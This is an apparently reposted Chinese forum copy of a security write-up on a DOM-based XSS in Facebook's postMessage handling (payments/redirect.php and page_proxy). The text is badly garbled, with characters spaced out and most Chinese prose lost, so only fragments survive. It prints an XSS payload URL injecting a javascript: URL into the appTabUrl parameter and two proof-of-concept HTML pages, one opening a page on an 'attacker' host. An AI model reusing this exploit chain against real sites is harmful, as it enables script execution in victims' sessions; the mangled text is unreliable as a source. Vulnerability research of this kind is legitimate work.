[16213] 2020-12-15_安全研究Facebook中基于DOM的XSS漏洞利用分析

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-18
2020-12-15_安全研究Facebook中基于DOM的XSS漏洞利用分析   |   F a c e b o o k D O M X S S A l p h a _ h 4 c k   F r e e B u f   2 0 2 0 - 1 2 - 1 5 f a c e b o o k . c o m p o s t M e s s a g e 使 p o s t M e s s a g e p o s t M e s s a g e E v e n t l i s t e n e r f a c e b o o k . c o m p o s t M e s s a g e h t t p s : / / w w w . f a c e b o o k . c o m / p a y m e n t s / r e d i r e c t . p h p t y p e i r p 使 p o s t M e s s a g e i 使 w i n d o w . p a r e n t . p a y m e n t s F l o w s . p r o c e s s I F r a m e o u r . i n t e r n . f a c e b o o k . c o m p o s t M e s s a g e F a c e b o o k 使 o u r . i n t e r n . f a c e b o o k . c o m 访 F a c e b o o k w w w . f a c e b o o k . c o m 访 a l p h a . f a c e b o o k . c o m 访 o u r . a l p h a . f a c e b o o k . c o m / p a y m e n t s / r e d i r e c t . p h p o u r . a l p h a . f a c e b o o k . c o m p o s t M e s s a g e t a r g e t O r i g i n o u r . i n t e r n o u r . a l p h a w w w . o u r . a l p h a . f a c e b o o k . c o m w w w . f a c e b o o k . c o m t a r g e t O r i g i n o u r . a l p h a . f a c e b o o k . c o m E v e n t L i s t e n e r s a c c e p t   f a c e b o o k . c o m X S S F a c e b o o k   C a n v a s a p p s . f a c e b o o k . c o m 访 F a c e b o o k i f r a m e U R L U R L s i g n e d _ r e q u e s t P O S T i f r a m e h t t p s : / / w w w . f a c e b o o k . c o m / p l a t f o r m / p a g e _ p r o x y / v e r s i o n = X p o s t M e s s a g e p a g e _ p r o x y p o s t M e s s a g e f r a m e N a m e E v e n t L i s t e n e r f o r m s u b m i t F o r m ( ) a c t i o n a . d a t a . p a r a m s . a p p T a b U r l U R L a p p T a b U r l U R L h t t p / h t t p s 使 J a v a S c r i p t X S S p a g e _ p r o x y P a y l o a d h t t p s : / / o u r . a l p h a . f a c e b o o k . c o m / p a y m e n t s / r e d i r e c t . p h p ? t y p e = r p & n a m e = _ s e l f & p a r a m s [ a p p T a b U r l ] = j a v a s c r i p t : a l e r t ( 1 ) ; & p a r a m s [ s i g n e d R e q u e s t ] = S I G N E D _ X & p l a t f o r m A p p C o n t r o l l e r G e t F r a m e P a r a m s R e s p o n s e = 1 O B J :   { t y p e : r p , n a m e : _ s e l f , p a r a m s : { a p p T a b U r l : j a v a s c r i p t : a l e r t ( 1 ) ; , s i g n e d R e q u e s t : S I G N E D _ X } , p l a t f o r m A p p C o n t r o l l e r G e t F r a m e P a r a m s R e s p o n s e : 1 }
访 p a g e _ p r o x y h t t p s : / / w w w . f a c e b o o k . c o m / p l a t f o r m / p a g e _ p r o x y / p a g e 2 . h t m l a l e r t ( 1 ) P o C 访 F a c e b o o k F a c e b o o s / p a y m e n t s / r e d i r e c t . p h p p o s t M e s s a g e a p p T a b U r l h t t p / h t t p s < h t m l > < b u t t o n   c l a s s = " b u t t o n "   o n C l i c k = " w i n d o w . o p e n ( ' h t t p s : / / a t t a c k e r / p a g e 2 . h t m l ' ,   ' _ b l a n k ' ) ; d o c u m e n t . l o c a t i o n . h r e f   =   ' h t t p s : / / o u r . a l p h a . f a c e b o o k . c o m / p l a t f o r m / p a g e _ p r o x y / ? v e r s i o n = X # _ s e l f ' ; " < s p a n   c l a s s = " i c o n " > S t a r t   A t t a c k < / s p a n > < / b u t t o n > < / h t m l > < h t m l > < s c r i p t > s e t T i m e o u t ( f u n c t i o n ( ) {   w i n d o w . l o c a t i o n . h r e f   =   ' h t t p s : / / o u r . a l p h a . f a c e b o o k . c o m / p a y m e n t s / r e d i r e c t . p h p ? t y p e = r p & m e r c h a n t _ g r o u p = 8 6 & n a m e = _ s e l f & p a r a m s [ a p p T a b U r l ] = j a v a s c r i p t : a l e r t ( 1 ) ; & p a r a m s [ s i g n e d R e q u e s t ] = S I G N E D _ X & p l a t f o r m A p p C o n t r o l l e r G e t F r a m e P a r a m s R e s p o n s e = 1 ' < / s c r i p t > < / h t m l >
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则